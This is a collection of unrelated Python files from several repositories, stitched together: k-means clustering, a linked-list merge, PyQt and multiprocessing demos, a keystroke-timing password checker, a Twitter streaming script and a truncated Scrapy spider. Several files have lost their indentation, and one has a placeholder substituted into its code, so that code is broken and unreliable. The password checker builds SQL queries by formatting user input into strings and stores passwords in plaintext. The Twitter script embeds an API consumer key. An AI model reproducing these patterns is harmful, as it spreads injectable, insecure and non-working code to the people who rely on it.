#### File: jenildesai25/k_means_implementation/Kmeans.py
```python
import numpy as np
import pandas as pd
from scipy.spatial import distance
def find_cluster(data_frame, data_frame_cluster):
cluster = {}
for i, center in enumerate(data_frame_cluster.values):
cluster[i] = []
for j, point in enumerate(data_frame.values):
euclDist = float('inf')
euclCenter = 0
for i, center in enumerate(data_frame_cluster.values):
dist = distance.euclidean(point, center)
if dist < euclDist:
euclDist = dist
euclCenter = i
# cluster[euclCenter] = []
if cluster[euclCenter]:
cluster[euclCenter].append(point)
else:
cluster[euclCenter] = [point]
# print(cluster)
return cluster
def mykmeans(X, k):
    # 1. Pick k random points from the dataset as the initial centroids.
    # 2. Assign every point to its nearest centroid (Euclidean distance).
    # 3. Recompute each centroid as the mean of the points assigned to it.
    # 4. Repeat steps 2 and 3 until the centroids no longer change.
try:
data_frame = pd.DataFrame(data=X)
# data_frame = data_frame
data_frame_cluster = data_frame.sample(n=k)
# print(data_frame_cluster)
prev_centers = []
while True:
# Group data in clusters
cluster = find_cluster(data_frame, data_frame_cluster)
# Calculate new centroid
centers = []
for clusterKey, clusterValue in cluster.items():
df = pd.DataFrame(clusterValue)
center = []
for column in df:
center.append(df[column].mean())
centers.append(center)
# Breaking condition, if prev centers and current centers are same
if prev_centers == centers:
break
data_frame_cluster = pd.DataFrame(centers)
prev_centers = centers
print("For k = " + str(k) + " centers are: ")
print(centers)
except Exception as e:
print(e)
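

# Minimal usage sketch (hypothetical data): cluster 100 random 2-D points into 3 groups.
# import numpy as np
# mykmeans(np.random.rand(100, 2), k=3)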
```
|
{
"source": "jenildesai25/LeetCode",
"score": 4
}
|
#### File: LeetCode/MergeTwoSortedLists/MergeTwoSortedLists.py
```python
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __repr__(self):
return '{}->{}'.format(self.val, self.next)
class MergeTwoSortedLists:
def merge_two_sorted_lists(self, list_node_1, list_node_2):
current = temp = ListNode(0)
while list_node_1 and list_node_2:
if list_node_1.val < list_node_2.val:
current.next = list_node_1
list_node_1 = list_node_1.next
else:
current.next = list_node_2
list_node_2 = list_node_2.next
current = current.next
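        # Attach whichever list still has remaining nodes; it is already sorted.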
current.next = list_node_1 or list_node_2
return temp.next
if __name__ == "__main__":
merge_two_sorted_lists_obj = MergeTwoSortedLists()
l1 = ListNode(1)
l1.next = ListNode(4)
l2 = ListNode(1)
l2.next = ListNode(4)
print(merge_two_sorted_lists_obj.merge_two_sorted_lists(l1, l2))
```
|
{
"source": "jenildesai25/logging",
"score": 3
}
|
#### File: jenildesai25/logging/closeButton.py
```python
import sys
from PyQt5.QtWidgets import (
QApplication, QWidget, QToolTip, QPushButton, QMessageBox)
from PyQt5.QtCore import QCoreApplication, Qt
class Window(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
btn = QPushButton()
# btn.setToolTip("Close Application")
# btn.clicked.connect(QCoreApplication.instance().quit)
        # Connect to close() so that closeEvent() below receives a real QCloseEvent;
        # wiring clicked straight to closeEvent would pass a bool instead of an event.
        btn.clicked.connect(self.close)
btn.resize(btn.sizeHint())
btn.move(410, 118)
self.setGeometry(30, 450, 500, 150)
self.setWindowTitle("Terminator")
self.show()
def closeEvent(self, event):
"""Generate 'question' dialog on clicking 'X' button in title bar.
Reimplement the closeEvent() event handler to include a 'Question'
        dialog asking how to proceed, with Yes and No buttons.
"""
reply = QMessageBox.question(
self, "Message",
"Are you sure you want to quit? Any unsaved work will be lost.",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.Yes)
# int(reply)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
def keyPressEvent(self, event):
"""Close application from escape key.
results in QMessageBox dialog from closeEvent, good but how/why?
"""
if event.key() == Qt.Key_Escape:
self.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
w = Window()
sys.exit(app.exec_())
```
#### File: jenildesai25/logging/multiprocessings.py
```python
from multiprocessing import Process, Queue
def is_even(numbers, q):
for n in numbers:
if n % 2 == 0:
q.put(n)
if __name__ == "__main__":
q = Queue()
p = Process(target=is_even,args=(range(20),q))
p.start()
p.join()
# print(q)
    # Queue objects are always truthy, so loop until the queue is empty instead.
    while not q.empty():
        print(q.get())
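    # With range(20) this prints the even numbers 0, 2, 4, ..., 18, one per line,
    # in the order the worker process put them on the queue.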
```
|
{
"source": "jenildesai25/password_checker",
"score": 3
}
|
#### File: password_checker/models/models.py
```python
from models.connection import Connection
# User Object
class User(object):
def __init__(self, id, username, fname, lname):
self.id = id
self.username = username
self.fname = fname
self.lname = lname
@classmethod
# Insert into User Table
def insert_into_user(cls, username, fname, lname):
conn = Connection()
query = "INSERT INTO User (FName, LName, Username) VALUES('{fname}', '{lname}', '{username}')".format(fname=fname, lname=lname, username=username)
cur = conn.get_cursor()
cur.execute(query)
conn.connection.commit()
conn.close_connection()
@classmethod
# Fetch from User Table
def fetch_by_username(cls, username):
conn = Connection()
query = "SELECT * FROM User WHERE Username = '{uname}'".format(uname=username)
cur = conn.get_cursor()
cur.execute(query)
user_row_dict = cur.fetchone()
conn.close_connection()
if user_row_dict:
return User(id=user_row_dict['ID'], username=user_row_dict['Username'], fname=user_row_dict['FName'],
lname=user_row_dict['LName'])
class Password(object):
def __init__(self, id, userid):
self.id = id
self.userid = userid
@classmethod
def insert_into_passwords(cls, password, userid):
conn = Connection()
# Update for all passwords of userid iscurrent=False
query = "UPDATE Passwords SET IsCurrent = False WHERE UserID = {userid}".format(userid=userid)
cur = conn.get_cursor()
cur.execute(query)
conn.connection.commit()
query = "INSERT INTO Passwords (IsCurrent, Password, UserID) VALUES({iscurrent}, '{password}', {userid})".format(
iscurrent=True, password=password, userid=userid)
cur.execute(query)
conn.connection.commit()
conn.close_connection()
@classmethod
def fetch_by_userid(cls, userid, password):
conn = Connection()
query = "SELECT * FROM Passwords WHERE Userid = {userid} AND Password = '{password}'".format(
userid=userid, password=password)
cur = conn.get_cursor()
cur.execute(query)
passwords_row_dict = cur.fetchone()
conn.close_connection()
if passwords_row_dict:
return Password(id=passwords_row_dict['ID'], userid=passwords_row_dict['UserID'])
class PasswordAnalytics(object):
def __init__(self, id, aggregate, count, passwordid):
self.id = id
self.aggregate = aggregate
self.count = count
self.passwordid = passwordid
@classmethod
def insert_into_password_analytics(cls, aggregate, count, password_id):
conn = Connection()
query = "INSERT INTO PasswordAnalytics (Aggregate, Count, PasswordID) VALUES ({aggregate}, {count}, " \
"{password_id})".format(aggregate=aggregate, count=count, password_id=password_id)
cur = conn.get_cursor()
cur.execute(query)
conn.connection.commit()
conn.close_connection()
@classmethod
def fetch_by_password_id(cls, password_id):
conn = Connection()
query = "SELECT * FROM PasswordAnalytics WHERE PasswordID = {password_id}".format(password_id=<PASSWORD>)
cur = conn.get_cursor()
cur.execute(query)
passwordanalytics_row_dict = cur.fetchone()
conn.close_connection()
if passwordanalytics_row_dict:
return PasswordAnalytics(id=passwordanalytics_row_dict['ID'],
aggregate=passwordanalytics_row_dict['Aggregate'],
count=passwordanalytics_row_dict['Count'],
passwordid=passwordanalytics_row_dict['PasswordID'])
def update_analytics(self, sample_aggregate, sample_count):
conn = Connection()
# Update for all passwords of userid iscurrent=False
query = "UPDATE PasswordAnalytics SET Aggregate = {0}, Count={1} WHERE PasswordID = {2}".format(
self.aggregate+sample_aggregate, self.count+sample_count, self.passwordid)
cur = conn.get_cursor()
cur.execute(query)
conn.connection.commit()
# Get mean
# Update Total and Count
```
#### File: password_checker/views/views.py
```python
from models.models import User, Password, PasswordAnalytics
from models.algorithm import Statistics, TTests
class Response(object):
def __init__(self, code, message, data=dict()):
self.code = code
self.message = message
self.data = data
def data_dict(self):
return {
'code': self.code,
'message': self.message,
'data': self.data
}
class UserView(object):
@classmethod
def register(cls, username, fname, lname, password, timestamp_array1, timestamp_array2, timestamp_array3):
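        # The timestamp arrays appear to hold key-press times in milliseconds; the pairwise
        # differences below are converted to seconds to form the typing-rhythm samples that
        # seed the user's password analytics baseline.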
time_array1 = []
for i in range(len(timestamp_array1) - 1):
time_array1.append(float(timestamp_array1[i + 1] - timestamp_array1[i])/float(1000))
time_array2 = []
for i in range(len(timestamp_array2) - 1):
time_array2.append(float(timestamp_array2[i + 1] - timestamp_array2[i])/float(1000))
time_array3 = []
for i in range(len(timestamp_array3) - 1):
time_array3.append(float(timestamp_array3[i + 1] - timestamp_array3[i])/float(1000))
print(time_array1, time_array2, time_array3)
# Create user
User.insert_into_user(username=username, fname=fname, lname=lname)
# Fetch user
user = User.fetch_by_username(username=username)
# Add new password
Password.insert_into_passwords(userid=user.id, password=password)
# Fetch the password
password = Password.fetch_by_userid(userid=user.id, password=password)
array1_sum = Statistics.sum(time_array1)
array2_sum = Statistics.sum(time_array2)
array3_sum = Statistics.sum(time_array3)
total_sum = array1_sum + array2_sum + array3_sum
total_lens = len(time_array1) + len(time_array2) + len(time_array3)
# Insert password analytics
PasswordAnalytics.insert_into_password_analytics(password_id=password.id, aggregate=total_sum, count=total_lens)
return Response(code=200, message='OK')
@classmethod
def login(cls, username, password, timestamp_array):
time_array = []
for i in range(len(timestamp_array) -1):
time_array.append(float(timestamp_array[i+1] - timestamp_array[i])/float(1000))
print(time_array)
# Fetch user
user = User.fetch_by_username(username=username)
if not user:
return Response(code=400, message='Invalid Username')
# Fetch Password object
password = Password.fetch_by_userid(userid=user.id, password=password)
if not password:
return Response(code=400, message='Invalid Password')
# Fetch Password Analytics
        password_analytics = PasswordAnalytics.fetch_by_password_id(password_id=password.id)
# Get statistics of user input
sample_stats = Statistics(data_list=time_array)
sample_stats.compute_all()
# Get statistics of existing inputs
population_mean = Statistics.mean(password_analytics.aggregate, password_analytics.count)
# Calculating the t statistic
t_stat = TTests.t_statistic(population_mean=population_mean,
sample_mean=sample_stats.data_list_mean,
sample_std_deviation=sample_stats.data_list_standard_dev,
sample_length=sample_stats.data_list_len_f)
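        # Presumably this computes the one-sample t statistic,
        #   t = (sample_mean - population_mean) / (sample_std_deviation / sqrt(sample_length)),
        # comparing this login's typing rhythm against the stored baseline mean.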
# Calculating the t distribution
t_dist_min, t_dist_max = TTests.t_distribution(sample_length=sample_stats.data_list_len_f, alpha=0.01)
print(t_stat, t_dist_min, t_dist_max)
if t_stat < t_dist_min or t_stat > t_dist_max:
return Response(code=400, message='Intrusion Detected')
else:
password_analytics.update_analytics(sample_stats.data_list_sum, int(sample_stats.data_list_len_f))
return Response(code=200, message='OK')
```
|
{
"source": "jenildesai25/Visa_interview",
"score": 3
}
|
#### File: jenildesai25/Visa_interview/compare_two_values.py
```python
# VISA full-time master's MCQ.
def func(a, b):
x = a
y = b
while x != y:
if x > y:
x = x - y
if x < y:
y = y - x
return x or y
print(func(2437, 875))
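# func repeatedly subtracts the smaller value from the larger one (the subtraction form of the
# Euclidean algorithm), so the call above prints gcd(2437, 875) = 1.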
```
|
{
"source": "jenilgandhi2111/Image-Captionizer",
"score": 3
}
|
#### File: jenilgandhi2111/Image-Captionizer/Main.py
```python
import matplotlib.pyplot as plt
import torch
import torchvision.transforms as transforms
import torch.optim as optim
import torch.nn as nn
from preprocessing import get_loader
from testing import print_test_examples
from model import ImageCaptionizer
from tqdm import tqdm
def train():
loss_points = []
transform = transforms.Compose(
[
# Resizing to a larger dimension just to enhance features
transforms.Resize((356, 356)),
# Inception V3 Input size is (299,299)
transforms.RandomCrop((299, 299)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
)
# Getting the dataset from getloader
loader, dataset = get_loader(
root_folder="Image-Captionizer\Flickr8K\Images",
annotation_file="Image-Captionizer\Flickr8K\captions.txt",
transform=transform, num_workers=2
)
# HyperParams
device = torch.device("cpu")
embed_size = 256
hidden_size = 256
vocab_size = len(dataset.vocab)
num_layers = 1
lr = 3e-4
num_epochs = 1
model = ImageCaptionizer(embed_size, hidden_size, vocab_size, num_layers)
lossfn = nn.CrossEntropyLoss(ignore_index=dataset.vocab.stoi["<PAD>"])
optimizer = optim.Adam(model.parameters(), lr=lr)
for name, param in model.encoder.inception.named_parameters():
if "fc.weight" in name or "fc.bias" in name:
param.requires_grad = True
else:
param.requires_grad = False
model.train()
    for epoch in range(num_epochs):
        print("> Epoch:", str(epoch + 1))
        # Report sample captions once per epoch rather than on every batch.
        print_test_examples(model, device, dataset)
        for idx, (img, capt) in tqdm(enumerate(loader), total=len(loader), leave=False):
            img = img.to(device)
            capt = capt.to(device)
            # Teacher forcing: feed the caption without its final token and predict the next token at each step.
            outputs = model(img, capt[:-1])
            loss = lossfn(
                outputs.reshape(-1, outputs.shape[2]), capt.reshape(-1)
            )
            loss_points.append(loss.item())
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
    # Plot the recorded training loss once training is finished.
    plt.plot(loss_points)
    plt.show()


train()
```
#### File: jenilgandhi2111/Image-Captionizer/preprocessing.py
```python
import os
import torch
import spacy
import pandas as pd
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader, Dataset, dataset
from PIL import Image
import torchvision.transforms as transforms
spacy_en = spacy.load("en_core_web_sm")
class TextPreprocessor:
def __init__(self, threshhold=5):
print("> Text Preprocessor initialized")
self.threshhold = threshhold
self.stoi = {"<PAD>": 0, "<SOS>": 1, "<EOS>": 2, "<UNK>": 3}
self.itos = {0: "<PAD>", 1: "<SOS>", 2: "<EOS>", 3: "<UNK>"}
def __len__(self):
return len(self.stoi)
@staticmethod
def tokenizer_eng(text):
return [token.text.lower() for token in spacy_en(text)]
def build_vocab(self, captions):
print("> Building Vocab")
freq = {}
idx = 4
for sent in captions:
for word in self.tokenizer_eng(sent):
if word not in freq:
freq[word] = 1
else:
freq[word] += 1
# Now check if this word has the threshhold
# frequency if yes then add it to stoi and itos dict
if freq[word] == self.threshhold:
self.stoi[word] = idx
self.itos[idx] = word
idx += 1
print("> Finished Building Vocab")
def numericalize(self, text):
tokenized_txt = self.tokenizer_eng(text)
ret_list = []
ret_list.append(self.stoi["<SOS>"])
for token in tokenized_txt:
if token in self.stoi:
ret_list.append(self.stoi[token])
else:
ret_list.append(self.stoi["<UNK>"])
ret_list.append(self.stoi["<EOS>"])
return ret_list
class FlickrDataset(Dataset):
def __init__(self,
image_dir,
caption_file,
transforms=None,
threshhold=5):
print("> Dataset initialized")
self.root_dir = image_dir
self.caption_file = caption_file
self.df = pd.read_csv(caption_file)
self.transform = transforms
# The df would have a image and a caption mapped to it
self.images = self.df["image"]
self.captions = self.df["caption"]
self.vocab = TextPreprocessor(threshhold=threshhold)
self.vocab.build_vocab(self.captions.tolist())
def __len__(self):
return len(self.captions)
def __getitem__(self, index):
print("> Index:", str(index))
caption = self.captions[index]
# This a image path we need to open that image by PIL
image_idx = self.images[index]
image = Image.open(os.path.join(
self.root_dir, image_idx)).convert("RGB")
if self.transform is not None:
image = self.transform(image)
capt = []
capt += self.vocab.numericalize(caption)
return image, torch.tensor(capt)
# tx = TextPreprocessor(1)
# tx.build_vocab(["jenil is going home", "parishi is goint to school"])
# print(tx.numericalize("jenil is fine going"))
class Connector:
def __init__(self, padding_id):
self.pad_id = padding_id
def __call__(self, batch):
imgs = [item[0].unsqueeze(0) for item in batch]
imgs = torch.cat(imgs, dim=0)
targets = [item[1] for item in batch]
targets = pad_sequence(targets, batch_first=False,
padding_value=self.pad_id)
return imgs, targets
def get_loader(
    root_folder,
    annotation_file,
    transform=None,
    batch_size=32,
    num_workers=8,
    shuffle=True,
    pin_memory=True,
):
    print("> Loader Called")
    # Use the caller-supplied transform if given; otherwise fall back to the
    # default Inception-sized pipeline.
    if transform is None:
        transform = transforms.Compose([
            transforms.Resize((356, 356)),
            transforms.RandomCrop((299, 299)),
            transforms.ToTensor(),
            transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
        ])
dataset = FlickrDataset(root_folder, annotation_file, transforms=transform)
pad_idx = dataset.vocab.stoi["<PAD>"]
loader = DataLoader(
dataset=dataset,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=pin_memory,
collate_fn=Connector(padding_id=pad_idx),
)
return loader, dataset
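

# A minimal usage sketch (not part of the original file), assuming the Flickr8k
# images and captions.txt live at the paths shown; it only checks the shapes
# produced by the Connector collate function.
if __name__ == "__main__":
    example_loader, example_dataset = get_loader(
        root_folder=r"Image-Captionizer\Flickr8K\Images",            # assumed path
        annotation_file=r"Image-Captionizer\Flickr8K\captions.txt",  # assumed path
        batch_size=4,
        num_workers=0,
    )
    for imgs, captions in example_loader:
        # imgs: (4, 3, 299, 299); captions: (max_len, 4) because the
        # Connector pads with batch_first=False.
        print(imgs.shape, captions.shape)
        break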
```
|
{
"source": "jenilgandhi2111/Sequence-2-Sequence",
"score": 3
}
|
#### File: jenilgandhi2111/Sequence-2-Sequence/Dataloader.py
```python
import os
import sys
import pandas as pd
import spacy
import torch
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader, Dataset
spacy_ger = spacy.load("de_core_news_md")
spacy_eng = spacy.load("en_core_web_sm")
class Vocabulary:
def __init__(self,
language,
freq_threshhold):
self.language = language
if language == "de":
self.language_model = spacy_ger
else:
self.language_model = spacy_eng
self.freq_threshhold = freq_threshhold
self.itos = {0: "<PAD>", 1: "<SOS>", 2: "<EOS>", 3: "<UNK>"}
self.stoi = {"<PAD>": 0, "<SOS>": 1, "<EOS>": 2, "<UNK>": 3}
def __len__(self):
return len(self.stoi)
@staticmethod
def tokenizer(sent, tokenizer_fn):
# print([tok.text for tok in tokenizer_fn.tokenizer(sent[0])])
return [tok.text for tok in tokenizer_fn.tokenizer(sent[0])]
def build_vocab(self, sentence_list):
print("> Building vocab for:", self.language)
freq = {}
idx = 4
cntr = 0
for i in sentence_list:
# print(cntr)
cntr += 1
for word in self.tokenizer(i, self.language_model):
if word not in freq:
freq[word] = 1
else:
freq[word] += 1
                if freq[word] == self.freq_threshhold:
self.stoi[word] = idx
self.itos[idx] = word
idx += 1
# print(idx)
print("> Finised Building vocab for:", self.language)
# print(self.stoi)
def numericalize(self, text):
# print(self.stoi[text.split(" ")[0]])
# print(text.split(" ")[0])
# print(self.stoi[text.split(" ")[1]])
# print(text.split(" ")[1])
# print(text)
# print(self.stoi)
# print(self.itos[24])
# print(self.stoi['ballet'])
# print(self.itos[3755])
ret_lst = []
for word in self.language_model.tokenizer(text):
# print(word)
if str(word) in self.stoi:
ret_lst.append(self.stoi[str(word)])
else:
ret_lst.append(self.stoi["<UNK>"])
# print(ret_lst)
return ret_lst
class MyDataset(Dataset):
def __init__(self, eng_file, ger_file, freq_threshhold=2):
self.eng_file = eng_file
self.ger_file = ger_file
self.english = (pd.read_csv(
eng_file, delimiter="\n")).values.tolist()
self.german = (pd.read_csv(
ger_file, delimiter="\n")).values.tolist()
self.eng_vocab = Vocabulary("en", 2)
self.ger_vocab = Vocabulary("de", 2)
self.eng_vocab.build_vocab(self.english)
self.ger_vocab.build_vocab(self.german)
def __len__(self):
return len(self.english)
def __getitem__(self, index):
# print("index:", index)
eng_sent = self.english[index][0]
# print(eng_sent)
num_eng_sent = [self.eng_vocab.stoi["<SOS>"]]
num_eng_sent += self.eng_vocab.numericalize(eng_sent)
num_eng_sent.append(self.eng_vocab.stoi["<EOS>"])
# print(len(num_eng_sent))
ger_sent = self.german[index][0]
num_ger_sent = [self.ger_vocab.stoi["<SOS>"]]
num_ger_sent += self.ger_vocab.numericalize(ger_sent)
num_ger_sent.append(self.ger_vocab.stoi["<EOS>"])
# print(torch.tensor(num_eng_sent).shape)
return torch.tensor(num_eng_sent), torch.tensor(num_ger_sent)
class MyCollate:
def __init__(self, pad_id_eng, pad_id_ger):
self.pad_id_eng = pad_id_eng
self.pad_id_ger = pad_id_ger
    def __call__(self, batch):
        # item[0] is the numericalised English sentence and item[1] the German
        # one, so each side is padded with the PAD id of its own vocabulary.
        srcs = [item[0] for item in batch]
        srcs = pad_sequence(srcs, batch_first=False,
                            padding_value=self.pad_id_eng)
        trgs = [item[1] for item in batch]
        trgs = pad_sequence(trgs, batch_first=False,
                            padding_value=self.pad_id_ger)
        return srcs, trgs
def get_loader(english_file,
german_file,
batch_size=32,
num_workers=2,
shuffle=False,
pin_memory=True):
dataset = MyDataset(english_file, german_file, 2)
pad_id_eng = dataset.eng_vocab.stoi["<PAD>"]
pad_id_ger = dataset.ger_vocab.stoi["<PAD>"]
loader = DataLoader(dataset=dataset,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=pin_memory,
collate_fn=MyCollate(pad_id_eng=pad_id_eng, pad_id_ger=pad_id_ger))
return loader, dataset
# if __name__ == "__main__":
# loader, dataset = get_loader("english.tsv",
# "german.tsv")
# cntr = 0
# for idx, (a, b) in enumerate(loader):
# if cntr == 0:
# cntr += 1
# print(a.shape)
# print(b.shape)
# print(a)
# print(a.shape)
# md = MyDataset("english.tsv", "german.tsv", 2)
# print(md[9])
```
|
{
"source": "jenish-acharya/puppy_store",
"score": 3
}
|
#### File: puppies/tests/test_views.py
```python
import json
from rest_framework import status
from django.test import TestCase, Client
from django.urls import reverse
from puppies.models import Puppy
from puppies.serializers import PuppySerializer
# initialize the APIClient app
client = Client()
class GetAllPuppiesTest(TestCase):
"""Test module for GET all puppies API"""
def setUp(self):
Puppy.objects.create(name="Casper", age=3, breed="Bull Dog", color="Black")
Puppy.objects.create(name="Muffin", age=1, breed="Gradane", color="Brown")
Puppy.objects.create(name="Rambo", age=2, breed="Labrador", color="Black")
Puppy.objects.create(name="Ricky", age=6, breed="Labrador", color="Brown")
def test_get_all_puppies(self):
# get API response
response = client.get(reverse("get_post_puppies"))
# get data from db
puppies = Puppy.objects.all()
serializer = PuppySerializer(puppies, many=True)
self.assertEqual(response.data, serializer.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
class GetSinglePuppyTest(TestCase):
"""Test module for GET single puppy API"""
def setUp(self):
self.casper = Puppy.objects.create(
name="Casper", age=3, breed="Bull Dog", color="Black"
)
self.muffin = Puppy.objects.create(
name="Muffin", age=1, breed="Gradane", color="Brown"
)
self.rambo = Puppy.objects.create(
name="Rambo", age=2, breed="Labrador", color="Black"
)
self.ricky = Puppy.objects.create(
name="Ricky", age=6, breed="Labrador", color="Brown"
)
def test_get_valid_single_puppy(self):
response = client.get(
reverse("get_delete_update_puppy", kwargs={"pk": self.rambo.pk})
)
puppy = Puppy.objects.get(pk=self.rambo.pk)
serializer = PuppySerializer(puppy)
self.assertEqual(response.data, serializer.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_invalid_single_puppy(self):
response = client.get(reverse("get_delete_update_puppy", kwargs={"pk": 30}))
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class CreateNewPuppyTest(TestCase):
"""
Test module for inserting a new puppy.
"""
def setUp(self) -> None:
self.valid_payload = {
"name": "Muffin",
"age": 5,
"breed": "Pamerion",
"color": "White",
}
self.invalid_payload = {
"name": "",
"age": 4,
"breed": "Pamerion",
"color": "White",
}
def test_create_valid_puppy(self):
response = client.post(
reverse("get_post_puppies"),
data=json.dumps(self.valid_payload),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_invalid_puppy(self):
response = client.post(
reverse("get_post_puppies"),
data=json.dumps(self.invalid_payload),
content_type=("application/json"),
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class UpdateSinglePuppyTest(TestCase):
"""
Test module for updating an existing puppy record
"""
def setUp(self) -> None:
self.casper = Puppy.objects.create(
name="Casper", age=3, breed="Bull Dog", color="Black"
)
self.muffin = Puppy.objects.create(
name="Muffy", age=1, breed="Gradane", color="Brown"
)
self.valid_payload = {
"name": "Muffy",
"age": 2,
"breed": "Labrador",
"color": "Black",
}
self.invalid_payload = {
"name": "",
"age": 4,
"breed": "Pamerion",
"color": "White",
}
def test_valid_update_puppy(self):
response = client.put(
reverse("get_delete_update_puppy", kwargs={"pk": self.muffin.pk}),
data=json.dumps(self.valid_payload),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_invalid_update_puppy(self):
response = client.put(
reverse("get_delete_update_puppy", kwargs={"pk": self.muffin.pk}),
data=json.dumps(self.invalid_payload),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class DeleteSinglePuppyTest(TestCase):
"""
Test module for deleting an existing puppy record
"""
def setUp(self) -> None:
self.casper = Puppy.objects.create(
name="casper", age=3, breed="Bull Dog", color="Black"
)
self.muffin = Puppy.objects.create(
name="Muffy",
age=4,
breed="Gradane",
color="Brown",
)
def test_valid_delete_puppy(self):
response = client.delete(
reverse("get_delete_update_puppy", kwargs={"pk": self.muffin.pk}),
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_invalid_delete_puppy(self):
response = client.delete(reverse("get_delete_update_puppy", kwargs={"pk": 30}))
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
```
|
{
"source": "jenish-cj/botnlufoodrest",
"score": 2
}
|
#### File: rasa_core/training_utils/story_graph.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import random
from collections import deque, defaultdict
import typing
from rasa_core.domain import Domain
from typing import List, Text, Dict, Optional
from rasa_core.interpreter import RegexInterpreter, NaturalLanguageInterpreter
from rasa_core import utils
if typing.TYPE_CHECKING:
from rasa_core.training_utils.dsl import StoryStep, Story, \
TrainingsDataExtractor
class StoryGraph(object):
def __init__(self, story_steps):
# type: (List[StoryStep]) -> None
self.story_steps = story_steps
self.step_lookup = {s.id: s for s in self.story_steps}
self.ordered_ids = StoryGraph.order_steps(story_steps)
def ordered_steps(self):
# type: () -> List[StoryStep]
"""Returns the story steps ordered by topological order of the DAG."""
return [self.get(step_id) for step_id in self.ordered_ids]
def get(self, step_id):
# type: (Text) -> Optional[StoryStep]
"""Looks a story step up by its id."""
return self.step_lookup.get(step_id)
def build_stories(self,
domain,
max_number_of_trackers=2000):
        # type: (Domain, int) -> List[Story]
"""Build the stories of a graph."""
from rasa_core.training_utils.dsl import STORY_START, Story
active_trackers = {STORY_START: [Story()]}
rand = random.Random(42)
for step in self.ordered_steps():
if step.start_checkpoint_name() in active_trackers:
# these are the trackers that reached this story step
# and that need to handle all events of the step
incoming_trackers = active_trackers[step.start_checkpoint_name()]
# TODO: we can't use tracker filter here to filter for
# checkpoint conditions since we don't have trackers.
# this code should rather use the code from the dsl.
if max_number_of_trackers is not None:
incoming_trackers = utils.subsample_array(
incoming_trackers, max_number_of_trackers, rand)
events = step.explicit_events(domain)
# need to copy the tracker as multiple story steps might
# start with the same checkpoint and all of them
# will use the same set of incoming trackers
if events:
trackers = [Story(tracker.story_steps + [step])
for tracker in incoming_trackers]
else:
trackers = [] # small optimization
# update our tracker dictionary with the trackers that handled
# the events of the step and that can now be used for further
# story steps that start with the checkpoint this step ended on
if step.end_checkpoint_name() not in active_trackers:
active_trackers[step.end_checkpoint_name()] = []
active_trackers[step.end_checkpoint_name()].extend(trackers)
return active_trackers[None]
def as_story_string(self):
story_content = ""
for step in self.story_steps:
story_content += step.as_story_string(flat=False)
return story_content
@staticmethod
def order_steps(story_steps):
# type: (List[StoryStep]) -> Deque[Text]
"""Topological sort of the steps returning the ids of the steps."""
checkpoints = StoryGraph._group_by_start_checkpoint(story_steps)
graph = {s.id: [other.id
for other in checkpoints[s.end_checkpoint_name()]]
for s in story_steps}
return StoryGraph.topological_sort(graph)
@staticmethod
def _group_by_start_checkpoint(story_steps):
# type: (List[StoryStep]) -> Dict[Text, List[StoryStep]]
"""Returns all the start checkpoint of the steps"""
checkpoints = defaultdict(list)
for step in story_steps:
checkpoints[step.start_checkpoint_name()].append(step)
return checkpoints
@staticmethod
def topological_sort(graph):
"""Creates a topsort of a directed graph. This is an unstable sorting!
The graph should be represented as a dictionary, e.g.:
>>> example_graph = {
... "a": ["b", "c", "d"],
... "b": [],
... "c": ["d"],
... "d": [],
... "e": ["f"],
... "f": []}
>>> StoryGraph.topological_sort(example_graph)
deque([u'e', u'f', u'a', u'c', u'd', u'b'])
"""
GRAY, BLACK = 0, 1
ordered = deque()
unprocessed = set(graph)
visited_nodes = {}
def dfs(node):
visited_nodes[node] = GRAY
for k in graph.get(node, ()):
sk = visited_nodes.get(k, None)
if sk == GRAY:
raise ValueError("Cycle found at node: {}".format(sk))
if sk == BLACK:
continue
unprocessed.discard(k)
dfs(k)
ordered.appendleft(node)
visited_nodes[node] = BLACK
while unprocessed:
dfs(unprocessed.pop())
return ordered
```
|
{
"source": "jenishmaharjan/big-data-python-class",
"score": 3
}
|
#### File: Streams/Code/tweetstream1.py
```python
from tweepy.streaming import StreamListener
from tweepy.auth import OAuthHandler
from tweepy import Stream
#Variables that contains the user credentials to access Twitter API
access_token = "<KEY>"
access_token_secret = "<KEY>"
consumer_key = "PeQ7nqZbgkDsLPYwUhZnCVmEc"
consumer_secret = "<KEY>"
# This is a basic listener that just prints received tweets to stdout.
class StdOutListener(StreamListener):
def on_data(self, data):
#file=open("TweetOut.txt","a")
#file.write(data)
print(data)
return True
def on_error(self, status):
print (status)
if __name__ == '__main__':
    # This handles Twitter authentication and the connection to the Twitter Streaming API
l = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, l)
    # This line filters Twitter streams to capture data by the keywords: 'Microsoft', 'Stock'
stream.filter(track=['Microsoft', 'Stock'])
```
#### File: datablogger_scraper/spiders/datablogger.py
```python
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import Rule, CrawlSpider
from datablogger_scraper.items import DatabloggerScraperItem
class DatabloggerSpider(CrawlSpider):
# The name of the spider
name = "datablogger"
# The domains that are allowed (links to other domains are skipped)
